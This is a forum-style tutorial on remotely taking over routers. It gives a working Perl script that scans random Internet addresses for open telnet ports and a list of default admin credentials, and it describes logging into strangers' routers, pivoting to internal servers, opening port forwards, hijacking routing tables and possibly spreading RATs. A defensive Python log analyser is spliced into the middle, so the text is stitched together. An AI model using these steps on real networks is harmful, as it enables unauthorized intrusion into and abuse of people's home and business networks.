Hack Router For Exploration

REMOTE ROUTER HACKING
Introduction
In my previous posts I have explained how to hack a PC using its IP address and how to hack someone's PC using NMAP (a networking tool). In this post I will explain router hacking. Basically, this tutorial deals with how to scan large numbers of addresses for telnet services, which we can then attempt to log in to with default credentials, with surprising success.

Why Telnet? Isn't That Dead Now?
You're partly correct: telnet is dead now; it was superseded by SSH because telnet sends packets in plain text, whereas SSH encrypts packets. But telnet is still very much used on routers for simple administration by low-tech management systems that come packaged with a lot of off-the-shelf routers. Some of these routers allow remote clients to connect to telnet as well as local users - these are the boxes that we are looking for.

So What Do I Need?
You'll need to run this Perl script (written by me, found below). It simply generates a random IP address; if the IP is in a scannable class (i.e. not a private, experimental or loopback address) the program attempts to open a connection to the telnet port (23) of the random IP, and if it succeeds the program logs the success in a local file for later analysis. The program then repeats -- so if you run a few instances of the program for a few hours you can end up with a list of around 200 telnet servers. I have left mine overnight before and collected 880 servers.

Code:
#!/usr/bin/perl
use IO::Socket;
########################### IP GENERATOR ########################
sub ipgen(){
    my $range1 = 223;                   # avoid experimental and multicast
    my $range2 = 254;
    $oct1 = int(rand($range1)) + 1;     # generate random octets
    $oct2 = int(rand($range2)) + 1;
    $oct3 = int(rand($range2)) + 1;
    $oct4 = int(rand($range2)) + 1;

    if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){ # gets rid of loopbacks and private ips
        $ip = &ipgen();                 # if local or private, call again
    }else{
        $ip = "$oct1.$oct2.$oct3.$oct4"; # otherwise allocate the ip to return
    }
    return $ip;                         # return to caller
}
#################################################################
############################## MAIN #############################
print "########################################\n";
print "#---------Random Telnet Scanner--------#\n";
print "#-----------Written by 50LaR15---------#\n";
print "########################################\n";
while(1==1){                            # keeps code running indefinitely
    $target = &ipgen();                 # get random ip to scan
    print "*??* SCANNING: $target \n";  # output
    my $sock = new IO::Socket::INET (   # try to create socket to the chosen random address
        PeerAddr => $target,
        PeerPort => '23',               # change this number to change the port you want to detect
        Proto    => 'tcp',
        Timeout  => '3',                # you can get away with a timeout of 1 second but 3 is used here to be safe
    );
    if($sock){                          # if socket opened (port open)
        print "*!!* SUCCESS-: $target \n";                           # print to screen
        open(DAT, ">>telnet.txt") || die("Cannot Open Output File"); # open results file
        print DAT "SUCCESS: $target \n";                             # append findings to end of file
        close(DAT);                                                  # close the file
    }
    close($sock);                       # close the socket
}################################################################

You'll also need a telnet client. I recommend PuTTY because it supports proxies, but you are dealing with people who don't know how to change their router passwords, so you shouldn't be too worried and can use the default OS telnet client: Windows XP/Linux users will already have one; Windows 7 users will need to enable theirs.

Ok - I'm Set Up - So Now What?
You'll need to start a few instances of the Perl script; you can make your desktop look pretty like mine below if you wish.

[Image: 4185786.png]

You can just run one, but it will take longer to get a decent-sized list of servers. I run 5 for around half an hour and that gives me a list of around 50 telnet boxes.

OK, now you have your list of IPs with the telnet port open (called telnet.txt, in the same directory as your Perl script). What you need to do is take your telnet client and just start connecting to them - you will be prompted for a username and password.

This is where it gets fun, because a large number of routers ship with default accounts. Here are the most common.

Username:Password
_________________
admin : admin
admin : (blank password)
root : (blank)
root : root

To be honest, a lot of routers disclose their model number in the telnet banner when you connect, so a simple Google search often turns up the default username and password. Otherwise I try the top 3, usually get disconnected, and move on to the next in my list.

You will find out quite fast how many IPs in your list you can actually log into with full admin rights.
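The scanning and default-credential attempts described above leave traces on the router side. As an added example (not part of the original post), the Python script below reads telnetd-style login lines in a constructed, hypothetical syslog format, flags telnet logins reaching the router from outside the loopback/RFC1918 ranges (the same ranges the Perl script skips), counts failed attempts with the default usernames listed above per source, and reports any successful login from the Internet side. The log format, hostname and addresses are all constructed for the example.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample lines in a hypothetical telnetd syslog format (not from any real device).
# Sources use documentation ranges (203.0.113.0/24, 198.51.100.0/24) to stand in for Internet hosts.
SAMPLE_LOG = """\
Jan 12 03:14:07 gw telnetd[812]: login user='admin' from 203.0.113.45 result=FAIL
Jan 12 03:14:09 gw telnetd[812]: login user='admin' from 203.0.113.45 result=FAIL
Jan 12 03:14:12 gw telnetd[812]: login user='root' from 203.0.113.45 result=OK
Jan 12 08:02:51 gw telnetd[815]: login user='alice' from 192.168.1.20 result=OK
Jan 12 09:41:30 gw telnetd[819]: login user='root' from 198.51.100.7 result=FAIL
"""

LINE_RE = re.compile(
    r"telnetd\[\d+\]: login user='(?P<user>[^']*)' from (?P<src>[\d.]+) result=(?P<res>OK|FAIL)"
)
DEFAULT_USERS = {"admin", "root"}  # the default accounts listed in the post
# Loopback plus RFC1918: anything outside these reached the router from the Internet side.
LOCAL_NETS = [ipaddress.ip_network(n) for n in ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_local(addr):
    return any(addr in net for net in LOCAL_NETS)


def parse(log_text):
    """Yield (user, src_ip, success) for every line in the telnetd login format."""
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m["user"], ipaddress.ip_address(m["src"]), m["res"] == "OK"


def analyse(log_text):
    """Return WAN-side telnet sources, default-account failures per source, and WAN-side successes."""
    wan_sources, default_guesses, wan_success = set(), Counter(), []
    for user, src, ok in parse(log_text):
        if not is_local(src):
            wan_sources.add(str(src))        # telnet is reachable from the Internet at all
            if ok:
                wan_success.append((user, str(src)))  # remote admin login: highest priority
        if user in DEFAULT_USERS and not ok:
            default_guesses[str(src)] += 1   # someone is trying the well-known defaults
    return {"wan_sources": sorted(wan_sources),
            "default_guesses": dict(default_guesses),
            "wan_success": wan_success}


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG).items():
        print(key, value)
```

Any non-empty wan_sources means the telnet service is exposed on the WAN interface and should be disabled or firewalled; a wan_success entry means the default account was also never changed.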

[Image: 4185900.png]
Who Exactly Am I Hacking?
This is half the fun for me - you don't really know. If you're interested you can just do a quick whois, but around 90% of the time you're dealing with home routers that people have bought from a shop and not configured properly. I have found businesses and offices that have succumbed to the same laziness as the home user, so the possibilities are endless.

OK, Now What?
From here it's up to you what you do, but I enjoy using simple network tools like ipconfig and ping to map out the network; sometimes I have found routers that have nmap and telnet clients on them, etc. Today I found one that let me download any C code onto it I wanted. Almost every router OS is different, so some take a while to get used to in terms of what commands you can run, but it is a lot of fun finding out people's network layout. I have compromised routers, made my way into the internal file servers of the network using brute forcers, or set up port forwarding on the router to give me external access to otherwise private internal resources - you can even port forward packets to printers and use them across the internet to print out hundreds of copies of the dictionary or whatever literature tickles your pickle.

A funny concept that I have got to work in the past is fucking with the routing tables and redirecting every web request to gay porn sites. So I would imagine that this could be useful for people trying to get RATs spread, especially if you find a router with upwards of 100 PCs behind it - but I don't deal much with RATs and botnets, so don't quote me on that.

A Small Aside.

I'll be happy if a few people read this tutorial and explore a few networks, because that's what used to drive hacking forwards, and it's what used to motivate hackers: the thrill of exploring the unknown, the chance of coming across a really large network to explore and further your knowledge and skills of systems. I think people focus too much on making money from hacking, or getting their best friend's fu**book password, and the real fun has somehow been lost in the past 10 years to a new generation of kids that just want everything now. Let's keep some of the old skills and knowledge alive and not let them be lost in the archives of long since abandoned forums and IRC rooms.
